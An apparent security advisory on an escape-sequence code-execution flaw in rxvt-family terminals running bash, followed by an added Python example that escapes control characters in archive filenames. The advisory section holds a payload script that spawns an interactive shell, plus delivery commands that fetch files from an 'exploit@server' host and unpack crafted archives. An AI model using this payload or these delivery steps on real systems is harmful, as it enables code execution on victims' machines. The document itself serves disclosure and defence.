(u)rxvt terminal (+bash) remoteish code execution 0day
source link: https://huumeet.info/~def/rxvt0day/
Date: 2021-04-20 (updated 2021-05-18)
Author: def <[email protected]>
Threads: oss-security
CVE: N/A
Version: rxvt 2.7.10, rxvt-unicode 9.22, mrxvt 0.5.4, aterm 1.0.1, eterm 0.9.7
Prerequisites
- rxvt, rxvt-unicode or other rxvt-based terminal
- bash shell. It is possible to target at least ksh as well, but zsh probably not
- User interaction! The victim must enter a command to run a program✱ that ...
  - plants attacker's payload file(s) in a subdirectory of the current directory
  - outputs text containing ANSI escape sequences which trigger the code execution
Payload (planted as ZZZ/0, ZZZ/1 and/or ZZZ/Z0 in the PoC exploits)
#!/bin/sh
uname -a && id && date && /bin/sh -i
scp -r exploit@server:/backup/ .
unrar x exploit.rar
busybox tar -xvf exploit.tar
Note: GNU tar is not exploitable due to proper escaping of ANSI escape sequences in filenames!
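The note about GNU tar points at the fix on the tool side: a program that prints attacker-controlled filenames should escape control characters before they reach the terminal. The following is an added example, not code from the advisory or from any of the tools named above; the function names, the octal escape format and the sample archive (which uses only a harmless colour sequence) are assumptions constructed for illustration.

```python
import io
import tarfile


def escape_name(name: str) -> str:
    """Double backslashes and replace every non-printable character
    (ESC, newline, C1 controls, undecodable bytes) with \\ooo octal escapes."""
    out = []
    for ch in name:
        if ch == "\\":
            out.append("\\\\")
        elif ch.isprintable():
            out.append(ch)
        else:
            # surrogateescape maps undecodable filename bytes back to raw bytes
            raw = ch.encode("utf-8", "surrogateescape")
            out.append("".join("\\%03o" % b for b in raw))
    return "".join(out)


def build_sample_archive() -> bytes:
    """Constructed sample: an in-memory tar with one plain member name and
    one name containing a benign SGR colour escape sequence."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("docs/readme.txt", "docs/\x1b[31mred\x1b[0m.txt"):
            info = tarfile.TarInfo(name)
            info.size = 0
            tar.addfile(info)
    return buf.getvalue()


def safe_listing(archive: bytes) -> list[str]:
    """Return member names in a form that is safe to print to a terminal."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        return [escape_name(m.name) for m in tar.getmembers()]


if __name__ == "__main__":
    for line in safe_listing(build_sample_archive()):
        print(line)
```
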